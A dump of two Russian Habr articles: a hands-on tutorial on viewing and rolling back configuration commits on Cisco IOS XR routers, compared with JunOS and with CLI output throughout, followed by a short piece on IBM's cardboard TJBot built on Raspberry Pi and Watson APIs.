Все, кто хоть раз сталкивался с необходимостью внести изменения в конфигурацию оборудования Cisco под управлением IOS XR, знают, что в отличии от обычного IOS, IOS-XR требует производить коммит... |
Все, кто хоть раз сталкивался с необходимостью внести изменения в конфигурацию оборудования Cisco под управлением IOS XR, знают, что в отличии от обычного IOS, IOS-XR требует производить коммит для применения конфигурации. Но как закоммитить конфиг, думаю, что знают все, кто хоть раз в жизни щупал IOS XR. А вот как откатить конфиг назад? На JunOS все легко и понятно, чего не скажешь об IOS XR. До определенного времени и я этого не знал, но в одну из ночей у меня было всего 5 минут, чтобы этому научиться, откатить конфиг и не получить аварию. В сети ничего, кроме мануала самой Циски на английском я не нашел, поэтому решил написать небольшой ликбез по данной теме, авось кому то пригодится.
Итак, поехали… Примечание: хоть статья и рассчитана на начинающих инженеров, но может быть полезна и инженерам, не понаслышке знакомых с IOS XR. Как говорится, век живи-век учись.
Для начала — в качестве введения — кратко опишу процесс применения конфигурации на IOS XR для тех, кто с ним (IOS XR) еще не знаком. Предположим, что мы хотим добавить в конфиг например дескрипшн: RP/0/0/CPU0:RZN-PE4(config)#interface gigabitEthernet 0/0/0/5 description "link to RZN-CE4-SW5"
RP/0/0/CPU0:RZN-PE4(config)#show
Sun Dec 11 17:11:11.950 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/5
description "link to RZN-CE4-SW5"
!
end
На обычном IOS все просто — добавили что то в конфиг — изменения сразу применялись. На IOS XR пока мы не сделаем коммит, изменения не применятся: RP/0/0/CPU0:RZN-PE4(config)#do sh run int gi0/0/0/5 description
Sun Dec 11 17:12:09.346 UTC
% No such configuration item(s)
Делаем коммит: RP/0/0/CPU0:RZN-PE4(config)#commit comment add desc int ge0/0/0/5
Sun Dec 11 17:12:43.443 UTC
Теперь все в порядке, конфигурационные изменения применились: RP/0/0/CPU0:RZN-PE4(config)#do sh run int gi0/0/0/5 description
Sun Dec 11 17:12:48.353 UTC
interface GigabitEthernet0/0/0/5
description "link to RZN-CE4-SW5"
!
end
Как видно из представленных выше выводов я сделал комментарий к коммиту. Это очень помогает при поиске конфигурации на которую надо откатиться.
Теперь перейдем непосредственно к самим ролбэкам. Чтобы выполнить откат конфигурации, можно использовать следующую команду: RP/0/0/CPU0:RZN-PE4#rollback configuration ?
last Rollback last <n> commits made
to Rollback up to (and including) a specific commit
to-exclude Rollback up to (and excluding) a specific commit
1000000037 Commit ID
1000000036 Commit ID
1000000035 Commit ID
1000000034 Commit ID
1000000033 Commit ID
1000000032 Commit ID
1000000031 Commit ID
1000000030 Commit ID
1000000029 Commit ID
1000000028 Commit ID
1000000027 Commit ID
1000000026 Commit ID
1000000025 Commit ID
1000000024 Commit ID
1000000023 Commit ID
1000000022 Commit ID
1000000021 Commit ID
1000000020 Commit ID
1000000019 Commit ID
1000000018 Commit ID
Как видите, маршрутизатор вывалил нам кучу Commit ID. В отличии от Juniper, в котором список коммитов начинается с 0 и нулевой коммит — это текущий конфиг, на IOS XR ID коммита увеличивается при каждом коммите, и текущий коммит — тот который имеет наибольший ID из представленного списка. В нашем случае 1000000037 — это текущая конфигурация. Если сравнивать с JunOS — то это коммит с ID 0.
Если нам надо откатиться всего на один коммит — то есть на конфигурацию с ID 1000000036, то тут все просто, можно сделать так: RP/0/0/CPU0:RZN-PE4#rollback configuration last 1
И в итоге мы откатимся на конфигурацию с ID 1000000036.
Но если вы сделали не один коммит, или вам в ходе работ надо откатиться на определенную конфигурацию. Как быть тут? Для этого нужно посмотреть кто и когда делал коммиты и найти нужный: RP/0/0/CPU0:RZN-PE4#sh configuration commit list 10
Sun Dec 11 17:17:39.113 UTC
SNo. Label/ID User Line Client Time Stamp
~~~~ ~~~~~~~~ ~~~~ ~~~~ ~~~~~~ ~~~~~~~~~~
1 1000000037 bormoglot con0_0_CPU0 CLI Sun Dec 11 17:12:43 2016
2 1000000036 bormoglot con0_0_CPU0 CLI Sun Dec 11 16:55:22 2016
3 1000000035 bormoglot con0_0_CPU0 CLI Sun Dec 11 16:55:07 2016
4 1000000034 bormoglot con0_0_CPU0 CLI Sun Dec 11 16:54:56 2016
5 1000000033 bormoglot con0_0_CPU0 Rollback Sun Dec 11 16:34:08 2016
6 1000000032 bormoglot con0_0_CPU0 CLI Sun Dec 11 16:23:18 2016
7 1000000031 bormoglot con0_0_CPU0 Rollback Sun Dec 11 15:48:11 2016
8 1000000030 bormoglot con0_0_CPU0 CLI Sun Dec 11 15:43:43 2016
9 1000000029 bormoglot con0_0_CPU0 CLI Sun Dec 11 15:32:44 2016
10 1000000028 bormoglot con0_0_CPU0 CLI Sun Dec 11 09:26:59 2016 Примечание: цифра 10 означает сколько коммитов выводить, в противном случае Циска вывалит вам все коммиты, что будет являться избыточной информацией (вряд ли вы сделали 40-50 коммитов за раз, хотя кто знает…). В отличии от JunOS, IOS XR сохраняет 100 последних коммитов.
Но в моем случае представленный выше вывод не особо помог в поиске нужного коммита. Мало того что коммиты делал только я, так еще невозможно сориентироваться по времени на какой коммит мне надо вернуться. А вот тут нам помогут комментарии к коммитам: RP/0/0/CPU0:RZN-PE4#sh configuration commit list 5 detail
Sun Dec 11 17:20:19.682 UTC
1) CommitId: 1000000037 Label: NONE
UserId: bormoglotx Line: con0_0_CPU0
Client: CLI Time: Sun Dec 11 17:12:43 2016
Comment: add desc int ge0/0/0/5
2) CommitId: 1000000036 Label: NONE
UserId: bormoglotx Line: con0_0_CPU0
Client: CLI Time: Sun Dec 11 16:55:22 2016
Comment: "descr gi0/0/0/4"
3) CommitId: 1000000035 Label: NONE
UserId: bormoglotx Line: con0_0_CPU0
Client: CLI Time: Sun Dec 11 16:55:07 2016
Comment: "descr gi0/0/0/3"
4) CommitId: 1000000034 Label: NONE
UserId: bormoglotx Line: con0_0_CPU0
Client: CLI Time: Sun Dec 11 16:54:56 2016
Comment: "descr gi0/0/0/2"
5) CommitId: 1000000033 Label: NONE
UserId: bormoglotx Line: con0_0_CPU0
Client: Rollback Time: Sun Dec 11 16:34:08 2016
Comment: no evi2
Теперь проще, я вижу свои комментарии к коммитам и примерно могу понять, что я добавлял в каждом из коммитов. Но не всегда комментарий отражает все изменения в конфигурации. А уж если он написан не вами, то тогда вообще непонятно, что скрывается под описанным дескрипшеном. Чтобы понять, что именно менялось в конфиге, нужно воспользоваться следующей командой: RP/0/0/CPU0:RZN-PE4#show configuration commit changes 1000000037
Sun Dec 11 17:22:05.485 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/5
description "link to RZN-CE4-SW5"
!
end
Данная команда выводит, что именно было добавлено или удалено в конфигурацию в указанном коммите. Примечание: помимо ID коммита, есть и номер коммита по порядку, который указан в детальном выводе: 1) CommitId: 1000000037 Label: NONE
UserId: bormoglotx Line: con0_0_CPU0
Client: CLI Time: Sun Dec 11 17:12:43 2016
Comment: add desc int ge0/0/0/5
1- это номер коммита, а 1000000037 — его ID. Смотреть конфигурационные изменения или откатываться можно и по номеру коммита, например: RP/0/0/CPU0:RZN-PE4#show configuration commit changes last 1
Sun Dec 11 17:24:19.616 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/5
description "link to RZN-CE4-SW5"
!
end
После last указываете число коммитов до нужного (число равно номеру коммита). В отличии от ID, номер коммита постоянно меняется (думаю что ясно, что номер коммита инкрементируется с каждым выполнением коммита)
Но особенность данной команды в том, что она показывает нам именно те изменения, который были применены в указанном коммите. Для примера посмотрим что менялось в конфигурации при произведении коммита 1000000036: RP/0/0/CPU0:RZN-PE4#
RP/0/0/CPU0:RZN-PE4#show configuration commit changes 1000000036
Sun Dec 11 17:25:21.772 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/4
description "link to RZN-CE4-SW4"
!
end
По сути этот вывод показывает нам, что изменилось в коммите 1000000036 по сравнению с предыдущим коммитом 1000000035. То есть в мире JunOS аналог данной команды show system rollback 2 compare 3 (первая цифра — это конфигурация, которая будет выводится, вторая цифра, это конфигурация, с которой будет производится сравнение). Точно так же работает и следующая команда, но выводит информацию так сказать “со своей колокольни”: RP/0/0/CPU0:RZN-PE4#show configuration rollback changes 1000000036
Sun Dec 11 17:27:34.912 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/4
no description "link to RZN-CE4-SW4"
!
end
Команда показывает, что мы отменим, если сделаем роллбэк на данный коммит, но показывает изменения в рамках только указанного коммита, а не всей конфигурации в целом. Например мы сделали 5 коммитов и теперь откатываемся на все 5 коммитов. Данная команда нам покажет не результирующие изменения при ролбэке на 5 коммитов, то только те изменения, которые будут отменены в рамках указанного commit ID, не принимая во внимание все промежуточные коммиты. Но ведь результатом применения ролбэка будет отмена не только указанного коммита, но и всех промежуточных изменений, то есть нам нужно видеть сравнение текущей конфигурации с конфигурацией, которая была на момент выполнения коммита, указанного в команде. То есть, если снова провести аналогию с миром JunOS, то нужен вывод команды show system rollback 5 compare 0 . Для этого необходимо использовать команду show configuration commit changes но с ключевым словом to или to-exclude : RP/0/0/CPU0:RZN-PE4#show configuration rollback changes ?
last Changes for rolling back last <n> commits
to Changes up to (and including) a specific commit
to-exclude Changes up to (and excluding) a specific commit Примечание: ключевое слово to-exclude появилось в 5-ой ветке IOS XR, и то не на всех версиях. Во всяком случае на версии 5.1.3 такой команды еще нет, а в 5.3.3 уже есть.
С ключевым словом to команда выведет вам все изменения, которые будут внесены в конфиг в результате применения ролбэка, включая указанный в команде коммит и все промежуточные изменения конфигурации. Смотрим как это работает: RP/0/0/CPU0:RZN-PE4#show configuration rollback changes to 1000000035
Sun Dec 11 17:32:21.933 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
no description "link to RZN-CE4-SW3"
!
interface GigabitEthernet0/0/0/4
no description "link to RZN-CE4-SW4"
!
interface GigabitEthernet0/0/0/5
no description "link to RZN-CE4-SW5"
!
end
То есть, если мы применим этот ролбэк, то отменяются все изменения включая и изменения, примененные в коммите 1000000035. По сути мы откатимся на конфигурацию, которая была до применения 1000000035 коммита, то есть на конфигурацию с commit ID 1000000034. Это становится понятно после просмотра внесенных в коммите 1000000035 изменений в конфигурацию: RP/0/0/CPU0:RZN-PE4#show configuration commit changes 1000000035
Sun Dec 11 17:34:23.184 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
description "link to RZN-CE4-SW3"
!
end
В данном коммите был добавлен дескрипшен на интерфейс GigabitEthernet0/0/0/3. В выводе команды show configuration rollback changes to 1000000035 показано, что этот дескрипшен будет удален и мы откатимся на конфигурацию, которая была добавлена коммитом 1000000034. Да, это немного отличается от JunOS-кого коммита. В JunOS мы прыгаем на указанную нами конфигурацию, а вот на IOS XR при использовании указанной команды мы прыгаем на конфигурацию, который была до применения указанного коммита, отменяя и изменения указанного в команде коммита. Обращаю внимание, что в версиях до 5.3.Х присутствует только такая команда.
При использовании команды с ключевым словом to-exclude , работы команды будет похожа на ролбэк в JunOS — будет выполнен откат на конфигурацию, которая была применена в указанном коммите: RP/0/0/CPU0:RZN-PE4#show configuration rollback changes to-exclude 1000000035
Sun Dec 11 17:37:17.183 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/4
no description "link to RZN-CE4-SW4"
!
interface GigabitEthernet0/0/0/5
no description "link to RZN-CE4-SW5"
!
end
Если сравнить с выводом, который был представлен при разборе команды с ключевым словом to , вы увидите различия — те изменения, которые были внесены при выполнении коммита 1000000035 не отменяются. Лично мне этот способ больше по душе, но, как я написал ранее, доступна данная команда только с версии 5.3.х. Примечание: команда show configuration commit changes тоже может показать все изменения, которые вносились начиная от текущей конфигурации до указанного коммита (беря во внимание все промежуточные изменения конфигураций). Для этого надо использовать ключевое слово since и указать ID коммита или ключевым словом last и указать порядковый номер коммита: RP/0/0/CPU0:RZN-PE4#sh configuration commit changes 1000000035
Sun Dec 11 18:01:33.533 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
description "link to RZN-CE4-SW3"
!
end RP/0/0/CPU0:RZN-PE4#sh configuration commit changes since 1000000035
Sun Dec 11 18:01:38.212 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
description "link to RZN-CE4-SW3"
!
interface GigabitEthernet0/0/0/4
description "link to RZN-CE4-SW4"
!
interface GigabitEthernet0/0/0/5
description "link to RZN-CE4-SW5"
!
end
Но повторюсь, не забывайте, что данная команда показывает все, что добавлено в конфигурацию начиная от указанного коммита и заканчивая текущим, и своим ролбэком вы все эти изменения откатите!
После JunOS немного сложно понять первый вариант ролбэка. Но двигаемся дальше.
В отличии от JunOS, Cisco при ролбэке не просто загружает конфигурацию, а сразу ее применяет, даже не спрашивая администратора. Это очень существенное отличие, особенно после JunOS, который загружает конфигурацию, дает ее отредактировать (если надо), проверить и закоммитить. Но не все так плохо, IOS XR тоже умеет загружать конфиг без автоматического коммита, но об этом чуть позже.
Посмотреть, что будет менять в конфигурации при ролбэке помимо указанных выше команд можно и другим способом, который придется по душе любителям JunOS. Надо воспользоваться указанными ранее командами но с ключевым словом diff . Вот пример вывода конфигурационных изменений в обычной форме: RP/0/0/CPU0:RZN-PE4#show configuration rollback changes to 1000000025
Sun Dec 11 17:42:44.450 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/1
shutdown
!
interface GigabitEthernet0/0/0/1.777 l2transport
!
interface GigabitEthernet0/0/0/2
no description "link to RZN-CE4-SW2"
!
interface GigabitEthernet0/0/0/3
no description "link to RZN-CE4-SW3"
!
interface GigabitEthernet0/0/0/4
no description "link to RZN-CE4-SW4"
!
interface GigabitEthernet0/0/0/5
no description "link to RZN-CE4-SW5"
!
no interface BVI777
interface BVI777
ipv4 address 10.0.0.254 255.255.255.0
no mac-address 200.0.4777
mac-address 200.0.4777
!
router bgp 6262
vrf VRF_EVPN
no address-family ipv4 unicast
!
!
evpn
!
end
А вот с использованием ключевого слова diff . Думаю, что вывод ниже читается проще, так как указано что добавляется а что удаляется из конфигурации: RP/0/0/CPU0:RZN-PE4#show configuration rollback changes to 1000000025 diff
Sun Dec 11 17:42:50.580 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
# interface GigabitEthernet0/0/0/1
+ shutdown
+ !
# interface GigabitEthernet0/0/0/1.777 l2transport
# !
- interface GigabitEthernet0/0/0/2
- description "link to RZN-CE4-SW2"
- !
- interface GigabitEthernet0/0/0/3
- description "link to RZN-CE4-SW3"
- !
- interface GigabitEthernet0/0/0/4
- description "link to RZN-CE4-SW4"
- !
- interface GigabitEthernet0/0/0/5
- description "link to RZN-CE4-SW5"
- !
- interface BVI777
+ interface BVI777
- vrf VRF_EVPN
- ipv4 address 10.0.0.254 255.255.255.0
+ ipv4 address 10.0.0.254 255.255.255.0
- mac-address 200.0.4777
+ mac-address 200.0.4777
+ !
# router bgp 6262
# vrf VRF_EVPN
- address-family ipv4 unicast
- label mode per-vrf
- redistribute connected
- redistribute static
- !
- !
- !
# evpn
# !
end
Правда выводятся конфигурационные изменения несколько странно, к примеру вот эти строки ни к чему: - ipv4 address 10.0.0.254 255.255.255.0
+ ipv4 address 10.0.0.254 255.255.255.0
- mac-address 200.0.4777
+ mac-address 200.0.4777
Зачем это сделано — мне не ясно. Но приходится с этим мириться.
Теперь рассмотрим еще одну очень полезную функцию — это загрузка конфигурации без ее автоматического коммита. Это делается уже из конфигурационного режима. Тут все действия такие же как и описано выше и действуют те же правила (to и to-exclude), но конфигурация не коммитится автоматом. Рассмотрим пример:
Если мы сделаем ролбэк, то удалится вот такая часть конфигурации: RP/0/0/CPU0:RZN-PE4#show configuration rollback changes to 1000000035
Sun Dec 11 17:50:53.187 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
no description "link to RZN-CE4-SW3"
!
interface GigabitEthernet0/0/0/4
no description "link to RZN-CE4-SW4"
!
interface GigabitEthernet0/0/0/5
no description "link to RZN-CE4-SW5"
!
end
Заходим в режим конфигурации и загружаем изменения: RP/0/0/CPU0:RZN-PE4(config)#load rollback changes to 1000000035
Building configuration...
Loading.
254 bytes parsed in 1 sec (249)bytes/sec Примечание: в выводе указано ключевое слово to, поэтому загружаются не только изменения, примененные в указанном коммите, но и все промежуточные коммиты. Если бы команда была бы без to: load rollback changes 1000000035 , то загрузились бы только изменения, которые были сделаны при данном коммите, а с ключевым словом to-exclude загрузятся все изменения до коммита 1000000035, не включая изменения, примененные в самом коммите 1000000035.
При простом ролбэке конфигурация автоматически бы закоммитилась и у нас бы были удалены дескрипшены с трех интерфейсов. В нашем случае все дескрипшены на месте: RP/0/0/CPU0:RZN-PE4(config)#do show int description | i 0/0/0/[3-5]
Sun Dec 11 17:49:31.632 UTC
Gi0/0/0/3 admin-down admin-down "link to RZN-CE4-SW3"
Gi0/0/0/4 admin-down admin-down "link to RZN-CE4-SW4"
Gi0/0/0/5 admin-down admin-down "link to RZN-CE4-SW5"
А вот если посмотреть конфигурацию, то мы видим, что изменения загружены, но не применены — можете их изменять (хотя это не так уж и просто, ибо часть конфига будет удалена — как видите вместо дескрипшена указана команда no description) и коммитить: RP/0/0/CPU0:RZN-PE4(config)#show
Sun Dec 11 17:49:33.962 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
no description
!
interface GigabitEthernet0/0/0/4
no description
!
interface GigabitEthernet0/0/0/5
no description
!
end
Если передумали коммитить, то проще всего использовать следующую команду: RP/0/0/CPU0:RZN-PE4(config)#abort
RP/0/0/CPU0:RZN-PE4#
Вас просто выкинет из режима конфигурации и все незакоммиченные изменения будут удалены. Если ввести end или exit, то Cisco спросит, что вы хотите сделать с незакомиченной конфигурацией: RP/0/0/CPU0:RZN-PE-4(config)#end
Uncommitted changes found, commit them before exiting(yes/no/cancel)? [cancel]:n
RP/0/0/CPU0:RZN-PE-4# RP/0/0/CPU0:RZN-PE-4(config)#exit
Uncommitted changes found, commit them before exiting(yes/no/cancel)? [cancel]:n
RP/0/0/CPU0:RZN-PE-4#
К одной из очень полезных функций можно причислить добавление метки к коммиту или ролбэку: RP/0/0/CPU0:RZN-PE-4#rollback configuration to 1000000003 label bormoglotx
RP/0/0/CPU0:RZN-PE-4#show configuration commit list
Sun Dec 11 18:42:50.333 UTC
SNo. Label/ID User Line Client Time Stamp
~~~~ ~~~~~~~~ ~~~~ ~~~~ ~~~~~~ ~~~~~~~~~~
1 bormoglotx bormoglot con0_0_CPU0 Rollback Sun Dec 11 18:42:40 2016
2 1000000004 bormoglot con0_0_CPU0 Rollback Sun Dec 11 18:33:34 2016
3 1000000003 bormoglot con0_0_CPU0 CLI Sun Dec 11 18:31:38 2016
4 1000000002 bormoglot con0_0_CPU0 CLI Sun Dec 11 18:31:25 2016
5 1000000001 bormoglot con0_0_CPU0 CLI Sun Dec 11 18:30:57 2016
Теперь вместо ID указано то, что вы напишите. Примечание: сам же ID все равно назначается и указывается или в детальном выводе или при выборе ID коммита: RP/0/0/CPU0:RZN-PE-4#show configuration rollback changes ?
bormoglotx 1000000005
bormoglotx-1 1000000006
На мой взгляд удобно. Две одинаковых метки указать не получится, получите вот такую ошибку: RP/0/0/CPU0:RZN-PE-4#rollback configuration to 1000000004 label bormoglotx
Sun Dec 11 18:47:24.214 UTC
Loading Rollback Changes.
Loaded Rollback Changes in 1 sec
Committing.
Rollback operation failed due to -
'CfgMgr' detected the 'warning' condition 'The specified label already exists in commit database.'
Running configuration has not been modified.
Еще одной полезной командой будет commit show-error , которая сразу указывает на ошибку (как это делает JunOS). Например коммит, который приведет к ошибке: RP/0/0/CPU0:RZN-PE-4(config)#commit
Sun Dec 11 18:58:40.048 UTC
% Failed to commit one or more configuration items during a pseudo-atomic operation. All changes made have been reverted. Please issue 'show configuration failed [inheritance]' from this session to view the errors
Теперь нам надо дать команду show configuration failed что бы увидеть проблему в конфиге. Но можно сразу дать команду commit show-error и если конфиг Циске не понравится, то в консоль сразу вывалится указание на ошибку: RP/0/0/CPU0:RZN-PE-4(config)#commit show-error
Sun Dec 11 18:59:44.254 UTC
% Failed to commit one or more configuration items during a pseudo-atomic operation. All changes made have been reverted.
!! SEMANTIC ERRORS: This configuration was rejected by
!! the system due to semantic errors. The individual
!! errors with each failed configuration command can be
!! found below.
interface BVI777
vrf VRF-TEST
!!% 'RSI' detected the 'fatal' condition 'The interface's numbered and unnumbered IPv4/IPv6 addresses must be removed prior to changing or deleting the VRF'
!
end
RP/0/0/CPU0:RZN-PE-4(config)#
В выводе сразу показан кусок конфига с ошибкой.
Так же хотел обратить внимание на функцию commit commit best-effort . Данное ключевое слово при коммите применит все строки, которые верны, а неверные будут проигнорированы. Возможно кому то данная функция будет нужна. Лично я ни разу ей не пользовался.
При необходимости весь коммит лист можно очистить (например при свопе или переиспользовании оборудования в качестве нового узла). Для этого нужно воспользоваться следующей командой: RP/0/0/CPU0:RZN-PE-4#clear configuration commits oldest 43
Sun Dec 11 18:26:58.078 UTC
Deleting 43 rollback points '1000000001' to '1000000043'
48 KB of disk space will be freed. Continue with deletion?[confirm]
RP/0/0/CPU0:RZN-PE-4#show configuration commit list
Sun Dec 11 18:27:18.977 UTC
The commit database is empty.
Правда информация о всех коммитах все равно сохранится, правда в другом месте: RP/0/0/CPU0:RZN-PE-4#show configuration history
Sun Dec 11 22:15:04.042 UTC
Sno. Event Info Time Stamp
~~~~ ~~~~~ ~~~~ ~~~~~~~~~~
1 startup configuration applied Sun Dec 11 07:00:27 2016
2 commit id 1000000001 Sun Dec 11 07:01:28 2016
3 commit id 1000000002 Sun Dec 11 07:07:19 2016
4 commit id 1000000003 Sun Dec 11 07:17:26 2016
Но на указанные в данном выводе ID нельзя ориентироваться, так как при сбросе нумерация начинается сначала, для примера, после 43 идет снова 1: RP/0/0/CPU0:RZN-PE-4#show configuration history | b ^52
Sun Dec 11 22:16:57.924 UTC
52 commit id 1000000043 Sun Dec 11 18:24:28 2016
53 commit id 1000000001 Sun Dec 11 18:28:53 2016
54 commit id 1000000001 Sun Dec 11 18:30:57 2016
Ну и не стоит забывать о такой важной и полезной команде, как commit confirmed , может существенно упростить жизнь и сберечь кучу нервов. Думаю, что представлять ее нет смысла.
В заключении хотел описать грабли, на которые я однажды наступил. Надо быть внимательным с командой rollback, если вы вместо rollback configuration to 1000000020 укажите rollback configuration 1000000020 , то изменения в текущей конфигурации ограничатся теми изменениями, которые были произведены в указанном вами commit ID. Продемонстрирую это на примере.
Я делаю последовательно три коммита, добавляя по одному дескрипшену. Первый коммит: RP/0/0/CPU0:RZN-PE-4(config)#interface gigabitEthernet 0/0/0/3 description 111111
RP/0/0/CPU0:RZN-PE-4(config)#commit comment add 11111
Tue Dec 13 08:21:15.328 UTC
RP/0/0/CPU0:RZN-PE-4(config)#
Второй коммит: RP/0/0/CPU0:RZN-PE-4(config)#interface gigabitEthernet 0/0/0/4 description 22222
RP/0/0/CPU0:RZN-PE-4(config)#commit comment add 22222
Tue Dec 13 08:21:33.627 UTC
RP/0/0/CPU0:RZN-PE-4(config)#
Третий коммит: RP/0/0/CPU0:RZN-PE-4(config)#interface gigabitEthernet 0/0/0/5 description 33333
RP/0/0/CPU0:RZN-PE-4(config)#commit comment add 33333
Tue Dec 13 08:21:54.856 UTC
RP/0/0/CPU0:RZN-PE-4(config)#
Смотрим ID наших коммитов: RP/0/0/CPU0:RZN-PE-4#show configuration commit list 5
Tue Dec 13 08:22:04.915 UTC
SNo. Label/ID User Line Client Time Stamp
~~~~ ~~~~~~~~ ~~~~ ~~~~ ~~~~~~ ~~~~~~~~~~
1 1000000022 bormoglot con0_0_CPU0 CLI Tue Dec 13 08:21:54 2016
2 1000000021 bormoglot con0_0_CPU0 CLI Tue Dec 13 08:21:33 2016
3 1000000020 bormoglot con0_0_CPU0 CLI Tue Dec 13 08:21:15 2016
4 1000000019 bormoglot con0_0_CPU0 Rollback Tue Dec 13 08:20:20 2016
5 1000000018 bormoglot con0_0_CPU0 CLI Tue Dec 13 08:16:26 2016
Теперь посмотрим, какие изменения вносились в коммиты (действительно ли это наши коммиты).
Первый ролбэк: RP/0/0/CPU0:RZN-PE-4#show configuration rollback changes 1000000022
Tue Dec 13 08:22:23.474 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/5
no description 33333
!
end
Второй ролбэк: RP/0/0/CPU0:RZN-PE-4#show configuration rollback changes 1000000021
Tue Dec 13 08:22:27.184 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/4
no description 22222
!
end
И третий ролбэк: RP/0/0/CPU0:RZN-PE-4#show configuration rollback changes 1000000020
Tue Dec 13 08:22:30.373 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
no description 111111
!
end
Предположим, что мне надо откатить все изменения и вернуться на конфигурацию, которая была при коммите 1000000019. Смотрим, что изменится при ролбэке: RP/0/0/CPU0:RZN-PE-4#show configuration rollback changes to 1000000020
Tue Dec 13 08:22:34.553 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
interface GigabitEthernet0/0/0/3
no description 111111
!
interface GigabitEthernet0/0/0/4
no description 22222
!
interface GigabitEthernet0/0/0/5
no description 33333
!
end
А теперь делая ролбэк, допускаем ошибку, пропуская ключевое слово to: RP/0/0/CPU0:RZN-PE-4#rollback configuration 1000000020
Tue Dec 13 08:22:49.342 UTC
Loading Rollback Changes.
Loaded Rollback Changes in 1 sec
Committing.
2 items committed in 1 sec (1)items/sec
Updating.
Updated Commit database in 1 sec
Configuration successfully rolled back commit '1000000020'.
Конфиг откатился, вроде все отлично. Но результат не тот, который мы ожидали. Смотрим конфиг: RP/0/0/CPU0:RZN-PE-4#show running-config
Tue Dec 13 08:22:56.432 UTC
Building configuration...
!! IOS XR Configuration 5.3.3
!! Last configuration change at Tue Dec 13 08:22:50 2016 by bormoglotx
!
hostname RZN-PE-4
interface MgmtEth0/0/CPU0/0
shutdown
!
interface GigabitEthernet0/0/0/0
description link to core
!
interface GigabitEthernet0/0/0/1
description link to SW1
!
interface GigabitEthernet0/0/0/2
shutdown
!
interface GigabitEthernet0/0/0/3
shutdown
!
interface GigabitEthernet0/0/0/4
description 22222
shutdown
!
interface GigabitEthernet0/0/0/5
description 33333
shutdown
!
#остальная часть конфига удалена для сокращения статьи
Удалился только дескрипшен с интерфейса interface GigabitEthernet0/0/0/3, который я навесил, делая коммит 1000000020, а изменения, которые были в коммитах 1000000021 и 1000000022 не отменились. Так что не пропускайте to или to-exclude при откате конфига, больше чем на 1 коммит.
Надеюсь описанное выше будет кому то полезно. Спасибо за внимание. | https://habrahabr.ru/post/317466/ |
habrahabr | TJBot: DIY-робот из картона под управлением ИИ, которого можно собрать за 15 минут | ['ibm', 'роботы', 'tj bot', 'сервисы', 'ibm watson'] |
В корпорации IBM работают люди, которым очень нравится своя работа. Здесь собрались творческие люди, инженеры, мыслители. Возможно, благодаря такому тандему компании удалось реализовать так... |
В корпорации IBM работают люди, которым очень нравится своя работа. Здесь собрались творческие люди, инженеры, мыслители. Возможно, благодаря такому тандему компании удалось реализовать так много интересных проектов. Сейчас в IBM один из важнейших аспектов работы — искусственный интеллект, когнитивные системы.
Сотрудники компании стараются доказать, что все это доступно обычному разработчику, а не небожителю. Здесь все просто и понятно. Плюс ко всему — еще и очень интересно. Все сказанное можно отнести к новой разработке компании, проекту, который можно назвать даже хобби. Речь идет о TJBot — картонном роботе, время сборки которого составляет около 15 минут. Управляет роботом IBM Watson.
Разработчик, который создает такого робота, может программировать его на выполнение различных действий. Все, что требуется для сборки — это чертеж из интернета, картон, Raspberry Pi и несколько дополнительных элементов. Это светодиоды, сервоприводы, камера, микрофон и многое другое — изменять и дополнять набор можно по своему желанию. Все инструкции и материалы доступны на GitHub . При этом приветствуются и рассказы о своих собственных роботах — все это просим выкладывать, если вам есть, о чем рассказать.
В качестве примера мы можем сейчас рассказать о том, как научить робота реагировать на эмоции, как его контролировать при помощи собственного голоса и как обучить его чатиться.
1. Учим TJ Bot реагировать на эмоции . В этом случае робот изменяет цвет своего RGB-светодиода, отвечая на проявление по отношению к нему различных эмоций. Правда, это касается не личного общения, а работе с Twitter. Для этого нужно подключить систему к Twitter API и запустить Watson Tone Analyzer для определения эмоциональной окраски сообщения. Например, можно научить бота реагировать на сообщения в режиме реального времени на сообщения пользователей сервиса микроблогов Twitter.
2. Голосовое управление TJBot . Да, маленький симпатичный робот из картона способен выполнять базовые голосовые команды. Например, вы можете попросить его включить желтый свет, и он изменит цвет светодиода на требуемый. Бот использует Watson Speech to Text API для анализа и понимания речи человека.
3. Чат с TJBot . Используя три API Watson, можно создать говорящего бота, с которым интересно общаться. Сначала сервис Watson Speech to Text API переведет голос в текст, Watson Conversation обработает текст и даст ответ, а Watson Text to Speech переведет текст в аудио. В итоге на голосовой запрос бот даст голосом свой ответ. Вы можете побеседовать с ботом на любые темы, от погоды до любимого ТВ-шоу.
Сам TJBot, несмотря на кажущуюся простоту (а он весьма непрост) несет в себе важную идею — встраивание слабой формы ИИ в объекты, характерные для нашего быта, работы, учебы. Технологии Watson можно использовать не только для создания картонных роботов. Они могут служить на благо людям, будучи встроены в гаджеты, бытовую технику или даже мебель.
В итоге человек сможет взаимодействовать с собственным зеркалом примерно так же, как с продвинутым устройством, работу которого обеспечивает нейросеть.
TJBot хорош тем, что с ним может работать и ребенок, и взрослый. Школьник, например, может удивить своих одноклассников, принеся на урок такую систему. Нечто более сложное может создать студент-электронщик или же профессиональный разработчик.
Если вы планируете поделиться собственными наработками в Сети, попробуйте использовать тег #TJBot, чтобы другие пользователи смогли легко найти вашу работу.
